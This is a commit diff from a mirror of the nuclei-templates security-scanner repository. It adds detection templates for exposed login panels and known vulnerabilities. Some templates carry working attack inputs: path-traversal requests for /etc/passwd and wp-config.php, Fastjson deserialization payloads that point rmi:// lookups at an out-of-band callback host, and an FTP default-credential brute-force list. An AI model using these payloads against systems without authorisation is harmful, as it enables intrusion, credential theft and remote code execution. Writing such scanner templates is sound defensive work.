daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into more-fixes

patch-1
sandeep 2021-10-18 03:14:44 +05:30
parent 68b63a9ca5 3d6a079b42
commit a614391d3f
44 changed files with 1761 additions and 938 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
.github/workflows/template-validate.yml vendored
View File

@ -23,11 +23,11 @@ jobs:
env:
GO111MODULE: on
run: |
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@master
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
shell: bash
- name: Template Validation
run: |
nuclei -validate -t .
# nuclei -validate -w ./workflows # Disabling temporarily
nuclei -validate -w ./workflows
shell: bash

3
.github/workflows/templates-stats.yml vendored
View File

@ -1,6 +1,9 @@
name: 🗒 Templates Stats
on:
create:
tags:
- v*
workflow_dispatch:
jobs:

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 |
| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 |
| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 |
| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 |
| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | |
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | |
| rce | 204 | gy741 | 81 | takeovers | 65 | | | | |
| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | |
| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | |
| cve2020 | 164 | madrobot | 63 | file | 49 | | | | |
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |
**171 directories, 2333 files**.
**176 directories, 2376 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

1800
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 |
| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 |
| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 |
| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 |
| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | |
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | |
| rce | 204 | gy741 | 81 | takeovers | 65 | | | | |
| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | |
| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | |
| cve2020 | 164 | madrobot | 63 | file | 49 | | | | |
| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 |
| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 |
| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 |
| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 |
| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | |
| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | |
| rce | 212 | gy741 | 81 | takeovers | 65 | | | | |
| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | |
| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | |
| cve2020 | 164 | madrobot | 63 | file | 50 | | | | |

30
cves/2015/CVE-2015-4694.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2015-4694
info:
name: Zip Attachments <= 1.1.4 - Arbitrary File Download
author: 0x_Akoko
severity: high
description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
reference: https://wpscan.com/vulnerability/8047
tags: lfi,wordpress,cve,cve2015,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2015-4694
cwe-id: CWE-22
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

3
cves/2019/CVE-2019-6340.yaml
View File

@ -38,8 +38,9 @@ requests:
words:
- "uid="
- "gid="
- "groups="
condition: and
part: body
- type: status
status:
- 200
- 200

30
cves/2021/CVE-2021-40438.yaml Normal file
View File

File diff suppressed because one or more lines are too long

5
cves/2021/CVE-2021-40978.yaml
View File

@ -9,6 +9,11 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
tags: cve,cve2021,mkdocs,lfi
description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-40978
cwe-id: CWE-22
requests:
- method: GET

5
cves/2021/CVE-2021-42013.yaml
View File

@ -10,6 +10,11 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42013
- https://twitter.com/itsecurityco/status/1446136957117943815
tags: cve,cve2021,lfi,apache,rce,misconfig
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-42013
cwe-id: CWE-22
requests:
- raw:

25
exposed-panels/cisco/cisco-ace-device-manager.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-ace-device-manager
info:
name: ACE 4710 Device Manager
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'html:"ACE 4710 Device Manager"'
requests:
- method: GET
path:
- "{{BaseURL}}/index.vm"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>ACE 4710 DM - Login</title>"
- type: status
status:
- 200

25
exposed-panels/cisco/cisco-edge-340.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-edge-340
info:
name: Cisco Edge 340
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'http.title:"Cisco Edge 340"'
requests:
- method: GET
path:
- "{{BaseURL}}/auth/?next=%2F"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Cisco Edge 340</title>"
- type: status
status:
- 200

25
exposed-panels/cisco/cisco-secure-cn.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-secure-cn
info:
name: Cisco Secure CN
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'http.title:"Cisco Secure CN"'
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Cisco Secure CN</title>"
- type: status
status:
- 200

25
exposed-panels/cisco/cisco-systems-login.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-systems-login
info:
name: Cisco Systems Login
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'http.title:"Cisco Systems Login"'
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<TITLE>Cisco Systems Login</TITLE>"
- type: status
status:
- 200

25
exposed-panels/cisco/cisco-telepresence.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cisco-telepresence
info:
name: Cisco Telepresence
author: dhiyaneshDk
severity: info
tags: panel,cisco
metadata:
shodan: 'http.title:"Cisco Telepresence"'
requests:
- method: GET
path:
- "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Cisco TelePresence MCU - login:</title>"
- type: status
status:
- 200

26
exposed-panels/dericam-login.yaml Normal file
View File

@ -0,0 +1,26 @@
id: dericam-login
info:
name: Dericam Login
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/7354
metadata:
shodan: 'http.title:"Dericam"'
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Dericam</title>"
- type: status
status:
- 200

26
exposed-panels/open-game-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: open-game-panel
info:
name: Open Game Panel
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/7418
metadata:
shodan: 'http.title:"Open Game Panel"'
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/index.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Open Game Panel</title>"
- type: status
status:
- 200

26
exposed-panels/project-insight-login.yaml Normal file
View File

@ -0,0 +1,26 @@
id: project-insight-login
info:
name: Project Insight - Login
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/7413
metadata:
shodan: 'http.title:"Project Insight - Login"'
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/auth/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Project Insight - Login</title>"
- type: status
status:
- 200

26
exposed-panels/squirrelmail-login.yaml Normal file
View File

@ -0,0 +1,26 @@
id: squirrelmail-login
info:
name: SquirrelMail - Login
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/7407
metadata:
shodan: 'http.title:"SquirrelMail - Login"'
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/src/login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>SquirrelMail - Login</title>"
- type: status
status:
- 200

26
exposed-panels/zimbra-web-client.yaml Normal file
View File

@ -0,0 +1,26 @@
id: zimbra-web-client
info:
name: Zimbra Web Client - Sign In
author: dhiyaneshDk
severity: info
reference: https://www.exploit-db.com/ghdb/7409
metadata:
shodan: 'http.title:"Zimbra Web Client Sign In"'
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}/zimbraAdmin/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Zimbra Administration</title>"
- type: status
status:
- 200

0
misconfiguration/phpmyadmin-setup.yaml → misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
View File

0
misconfiguration/phpmyadmin-sql.php-server.yaml → misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml
View File

35
misconfiguration/phpmyadmin/pma-server-import.yaml Normal file
View File

@ -0,0 +1,35 @@
id: pma-server-import
info:
name: PhpMyAdmin Server Import
author: Cristi vlad (@cristivlad25)
severity: high
description: Finds Unauthenticated PhpMyAdmin Server Import Pages.
tags: phpmyadmin,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/pma/server_import.php"
- "{{BaseURL}}/phpmyadmin/server_import.php"
- "{{BaseURL}}/phpMyAdmin 2/server_import.php"
- "{{BaseURL}}/db/server_import.php"
- "{{BaseURL}}/server_import.php"
- "{{BaseURL}}/PMA/server_import.php"
- "{{BaseURL}}/admin/server_import.php"
- "{{BaseURL}}/admin/pma/server_import.php"
- "{{BaseURL}}/phpMyAdmin/server_import.php"
- "{{BaseURL}}/admin/phpMyAdmin/server_import.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "File to import"
- "Location of the text file"
- type: status
status:
- 200

26
misconfiguration/skycaiji-install.yaml Normal file
View File

@ -0,0 +1,26 @@
id: skycaiji-install
info:
name: SkyCaiji Exposed Installation
author: pikpikcu
severity: high
tags: tech,skycaiji,exposure,misconfig
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?s=/install/index/index'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>蓝天采集器 SkyCaiji 安装</title>'
- 'https://www.skycaiji.com'
- '<a href="/index.php?s=/Install/Index/step1" class="btn btn-lg btn-success">'
condition: and
- type: status
status:
- 200

6
network/ftp-weak-credentials.yaml
View File

@ -10,10 +10,12 @@ network:
- inputs:
- data: "USER {{username}}\r\nPASS {{password}}\r\n"
host:
- "{{Hostname}}:21"
- "{{Hostname}}"
attack: clusterbomb
payloads:
username:
- admin
@ -27,9 +29,7 @@ network:
- pass1
- stingray
attack: clusterbomb
matchers:
- type: word
words:
- "230"
- "230 Login successful"

25
technologies/aviatrix-detect.yaml
View File

@ -2,7 +2,7 @@ id: aviatrix-detect
info:
name: Aviatrix Detect
author: pikpikcu
author: pikpikcu,philippedelteil
severity: info
tags: tech,aviatrix
@ -10,15 +10,20 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/assets/img/favicon-32x32.png"
matchers-condition: and
stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
name: "title"
condition: and
dsl:
- 'contains(body, "<title>Aviatrix")'
- 'contains(body, "Controller</title>")'
- 'status_code == 200'
- type: word
part: body
words:
- "<title>Aviatrix Controller</title>"
- type: status
status:
- 200
- type: dsl
name: "favicon"
dsl:
- "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))"

8
technologies/shiro-detect.yaml
View File

@ -11,10 +11,12 @@ requests:
path:
- '{{BaseURL}}'
headers:
Cookie: rememberMe=123;
Cookie: JSESSIONID={{randstr}};rememberMe=123;
redirects: true
max-redirects: 2
matchers:
- type: word
part: header
words:
- 'rememberMe=deleteMe'
part: header
- "rememberMe=deleteMe"

51
vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml Normal file
View File

@ -0,0 +1,51 @@
id: fastjson-1.2.24-rce
info:
name: Fastjson 1.2.24 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
- https://www.freebuf.com/vuls/208339.html
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: word
condition: and
words:
- "Internal Server Error"
- "500"

35
vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml Normal file
View File

@ -0,0 +1,35 @@
id: fastjson-1.2.41-rce
info:
name: Fastjson 1.2.41 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"Lcom.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

35
vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml Normal file
View File

@ -0,0 +1,35 @@
id: fastjson-1.2.42-rce
info:
name: Fastjson 1.2.42 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

35
vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml Normal file
View File

@ -0,0 +1,35 @@
id: fastjson-1.2.43-rce
info:
name: Fastjson 1.2.43 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

44
vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml Normal file
View File

@ -0,0 +1,44 @@
id: fastjson-1.2.47-rce
info:
name: Fastjson 1.2.47 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
- https://www.freebuf.com/vuls/208339.html
- https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
"autoCommit":true
}
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: word
condition: and
words:
- "Bad Request"
- "400"

34
vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml Normal file
View File

@ -0,0 +1,34 @@
id: fastjson-1.2.62-rce
info:
name: Fastjson 1.2.62 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"org.apache.xbean.propertyeditor.JndiConverter",
"AsText":"rmi://{{interactsh-url}}/exploit"
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

37
vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml Normal file
View File

@ -0,0 +1,37 @@
id: fastjson-1.2.67-rce
info:
name: Fastjson 1.2.67 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
"properties":{
"@type":"java.util.Properties",
"UserTransaction":"rmi://{{interactsh-url}}/Exploit"
}
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

55
vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml Normal file
View File

@ -0,0 +1,55 @@
id: fastjson-1.2.68-rce
info:
name: Fastjson 1.2.68 Deserialization RCE
author: zh
severity: critical
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
tags: fastjson,rce,deserialization,oob
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"org.apache.shiro.jndi.JndiObjectFactory",
"resourceName":"rmi://{{interactsh-url}}/Exploit"
}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
"jndiNames":"rmi://{{interactsh-url}}/Exploit"
}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"br.com.anteros.dbcp.AnterosDBCPConfig",
"metricRegistry":"rmi:/{{interactsh-url}}/Exploit"
}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
- type: status
negative: true
status:
- 200

32
vulnerabilities/jira/jira-unauthenticated-screens.yaml Normal file
View File

@ -0,0 +1,32 @@
id: jira-unauthenticated-screens
info:
name: Jira Unauthenticated Access to screens
author: TESS
severity: info
reference: https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get
tags: atlassian,jira
requests:
- method: GET
path:
- "{{BaseURL}}/rest/api/2/screens"
max-size: 1000
matchers-condition: and
matchers:
- type: word
words:
- '"id":'
- '"name":'
- '"description":'
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "atlassian.xsrf.token"

1
vulnerabilities/other/comtrend-password-exposure.yaml
View File

@ -4,6 +4,7 @@ info:
name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
author: geeknik
severity: high
description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint.
reference: https://www.exploit-db.com/exploits/16275
tags: router,exposure,iot

1
vulnerabilities/other/ewebs-arbitrary-file-reading.yaml
View File

@ -4,6 +4,7 @@ info:
name: EWEBS casmain.xgi arbitrary file reading vulnerability
author: pikpikcu
severity: high
description: A vulnerability in EWEBS's 'casmain.xgi' endpoint allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter.
reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
tags: ewebs,lfi

1
vulnerabilities/other/homeautomation-v3-openredirect.yaml
View File

@ -4,6 +4,7 @@ info:
name: HomeAutomation v3.3.2 Open Redirect
author: 0x_Akoko
severity: medium
description: A vulnerability in the HomeAutomation product allows remote unauthenticated attackers to inject a redirect URL via the 'api.php' endpoint and the 'redirect' parameter.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php
tags: iot,redirect

1
vulnerabilities/other/microstrategy-ssrf.yaml
View File

@ -14,6 +14,7 @@ requests:
- '{{BaseURL}}/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
- '{{BaseURL}}/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com'
stop-at-first-match: true
matchers:
- type: word
words:

27
vulnerabilities/wordpress/aspose-file-download.yaml Normal file
View File

@ -0,0 +1,27 @@
id: aspose-file-download
info:
name: Aspose Cloud eBook Generator - File Download
author: 0x_Akoko
severity: high
description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability.
reference: https://wpscan.com/vulnerability/7866
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

29
vulnerabilities/wordpress/aspose-words-file-download.yaml Normal file
View File

@ -0,0 +1,29 @@
id: aspose-words-file-download
info:
name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download
author: 0x_Akoko
severity: high
description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
reference:
- https://wpscan.com/vulnerability/7869
- https://wordpress.org/plugins/aspose-doc-exporter
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

2
workflows/rabbitmq-workflow.yaml
View File

@ -9,4 +9,4 @@ workflows:
- template: exposed-panels/rabbitmq-dashboard.yaml
subtemplates:
- template: default-logins/rabbitmq/rabbitmq-default-admin.yaml
- template: default-logins/rabbitmq/